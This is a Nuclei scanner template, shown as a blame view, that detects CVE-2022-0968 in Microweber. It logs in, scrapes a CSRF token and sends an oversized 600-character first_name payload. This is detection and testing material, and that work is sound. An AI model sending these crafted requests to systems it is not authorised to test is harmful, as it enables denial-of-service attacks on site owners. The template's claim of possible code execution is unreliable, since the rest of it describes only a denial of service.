nuclei-templates/http/cves/2022/CVE-2022-0968.yaml

84 lines
3.0 KiB
YAML
Raw Normal View History

2022-07-29 16:59:33 +00:00
id: CVE-2022-0968
2022-07-24 15:41:37 +00:00
info:
name: Microweber <1.2.12 - Integer Overflow
2022-07-24 15:41:37 +00:00
author: amit-jd
severity: medium
2022-07-29 16:59:33 +00:00
description: |
Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could lead to remote code execution or denial of service.
2023-09-06 11:59:08 +00:00
remediation: First name and last name input should be limited to 50 characters or maximum 100 characters.
2022-07-24 15:41:37 +00:00
reference:
- https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
2022-07-29 16:46:05 +00:00
- https://github.com/advisories/GHSA-5fxv-xx5p-g2fv
- https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e
- https://nvd.nist.gov/vuln/detail/CVE-2022-0968
2023-07-11 19:49:27 +00:00
- https://github.com/microweber/microweber/commit/80e39084729a57dfe749626c3b9d35247a14c49e
2022-07-24 15:41:37 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
cvss-score: 5.5
cve-id: CVE-2022-0968
2022-07-24 15:41:37 +00:00
cwe-id: CWE-190
2023-10-14 11:27:55 +00:00
epss-score: 0.00076
epss-percentile: 0.31127
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: microweber
product: microweber
tags: cve,cve2022,overflow,microweber,cms,huntr
2022-07-29 16:59:33 +00:00
variables:
2022-08-02 09:32:01 +00:00
payload: '{{repeat("A", 600)}}'
2022-07-24 15:41:37 +00:00
http:
2022-07-24 15:41:37 +00:00
- raw:
2022-07-27 08:00:19 +00:00
- |
2022-07-24 15:41:37 +00:00
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
2022-07-27 08:00:19 +00:00
- |
2022-07-24 15:41:37 +00:00
GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
Host: {{Hostname}}
2022-07-27 08:00:19 +00:00
- |
2022-07-24 15:41:37 +00:00
POST /api/user/2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2022-08-02 09:50:28 +00:00
thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
2022-07-27 08:12:25 +00:00
2022-07-29 16:59:33 +00:00
matchers:
- type: dsl
dsl:
2022-08-02 09:48:12 +00:00
- contains(body_3,'\"first_name\":\"{{payload}}\"')
2022-07-29 16:59:33 +00:00
- 'status_code_3==200'
- 'contains(header_3,"application/json")'
2022-07-29 16:59:33 +00:00
condition: and
2022-07-24 15:41:37 +00:00
2022-07-29 16:59:33 +00:00
extractors:
2022-07-24 15:41:37 +00:00
- type: regex
name: form_token
group: 1
regex:
- '<input type="hidden" name="token" value="(.*)" autocomplete="off">'
2023-07-11 19:49:27 +00:00
internal: true
part: body
2022-07-24 15:41:37 +00:00
- type: regex
2022-08-02 09:50:28 +00:00
name: user
2022-07-24 15:41:37 +00:00
group: 1
regex:
2022-08-02 10:35:03 +00:00
- '<input type="text" class="form-control" name="username" value="(.*)">'
2023-07-11 19:49:27 +00:00
internal: true
part: body
2022-07-24 15:41:37 +00:00
- type: regex
name: email
group: 1
regex:
2022-07-27 08:09:31 +00:00
- '<input type="email" class="form-control" name="email" value="(.*)">'
2023-07-11 19:49:27 +00:00
internal: true
part: body
# digest: 4a0a0047304502206baecad2aa4c9aac4f5d540e3b5e648f7a9b141bccc49ea830581d0b897725b8022100d81cb862277b9cf682bbb62a0352657c09414e3be37beb7f3a49bd980218b055:922c64590222798bb761d5b6d8e72950